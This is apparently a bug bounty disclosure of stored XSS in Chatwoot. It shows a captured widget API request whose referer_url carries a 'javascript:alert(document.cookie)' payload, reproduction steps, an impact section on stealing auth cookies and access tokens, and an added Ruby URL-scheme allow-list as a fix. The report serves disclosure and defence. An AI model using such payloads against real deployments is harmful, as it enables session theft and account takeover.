Insecure Storage of Sensitive Information in chatwoot/chatwoot
Reported on Feb 12th 2022
BUG
Stored XSS via referer URL allows hijacking the victim's access token
STEPS TO REPRODUCE
1. From the admin account go to https://app.chatwoot.com/app/accounts/42689/settings/inboxes/list and create an inbox of type "website". Now get your configuration script from this inbox and save it in an HTML file.
2. Now, as an external user, view the above file and send a support chat message while capturing it in Burp Suite. The request below is sent to the server:
POST /api/v1/widget/messages?website_token=6vsdbdaUQu21bnz3oFwhqQhW&locale=en HTTP/1.1
Host: app.chatwoot.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://app.chatwoot.com/widget?website_token=6vsdbdaUQu21bnz3oFwhqQhW
X-Auth-Token: eyJhbGciOiJIUzI1NiJ9.eyJzb3VyY2VfaWQiOiJlNDFhMWZiOC02MDk5LTQzZGQtOGUwYy0zMDRhODYzOTJmNGEiLCJpbmJveF9pZCI6MTEzNTZ9.cLoOIpAX0qWmbbLDVm3hCUb2DlmPJcwP9DJC-F8zSs8
Content-Type: application/json
Content-Length: 161
Origin: https://app.chatwoot.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"message":{"content":"xss via referer","timestamp":"Sat Feb 12 2022 21:56:37 GMT+0530 (India Standard Time)","referer_url":"javascript:alert(document.cookie)"}}
In this request I changed the referer_url parameter value to javascript:alert(document.cookie) and forwarded the request. A support message is now created.
3. Now, from the admin account, view the above chat message and CONTROL+click the referer link: the XSS is executed.
Video PoC
https://drive.google.com/file/d/1eQmGL0pvcaEcmRG_Tv0sA6-uznId7WYC/view?usp=sharing
IMPACT
I see that Chatwoot authenticates users using these headers: Access-Token, Token-Type, Client, Expiry, Uid. Those values are present in the cookie auth_data. So, using this XSS, the cookie can be stolen and the access token can also be stolen, and using those tokens an attacker can control the victim's account.
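A defensive check for this class of bug, added here as an example and not part of the original report or of Chatwoot's own code: a Ruby helper that accepts a referer_url only when it is an absolute http(s) URL, and otherwise renders it as HTML-escaped plain text with no href at all. The function names, the allow-list constant and the <a> markup are assumptions for illustration.

```ruby
require "uri"
require "cgi"

# Added example (not Chatwoot's code): allow-list the URL scheme of a
# user-supplied referer before it is ever rendered as a clickable link.
SAFE_REFERER_SCHEMES = %w[http https].freeze

# Returns a normalised absolute http(s) URL, or nil if the value must not
# become an href (javascript:, data:, scheme-relative, malformed, ...).
def safe_referer_url(value)
  return nil if value.nil?
  # Drop control characters and surrounding whitespace: browsers ignore
  # them when reading the scheme, so they must not influence the decision.
  cleaned = value.to_s.gsub(/[[:cntrl:]]/, "").strip
  return nil if cleaned.empty?
  uri = URI.parse(cleaned)
  return nil unless SAFE_REFERER_SCHEMES.include?(uri.scheme.to_s.downcase)
  return nil if uri.host.to_s.empty?
  uri.to_s
rescue URI::Error
  nil
end

# Renders the referer for the agent dashboard: a link only when the URL
# passed the allow-list, otherwise escaped text that cannot be clicked.
def referer_link_html(value)
  url = safe_referer_url(value)
  return CGI.escapeHTML(value.to_s) if url.nil?
  href = CGI.escapeHTML(url)
  %(<a href="#{href}" target="_blank" rel="noopener noreferrer">#{href}</a>)
end
```

The same allow-list belongs on the server side (model validation on the stored referer_url) so that a message created through the widget API, as in the captured request above, never carries a non-http(s) URL into the dashboard in the first place.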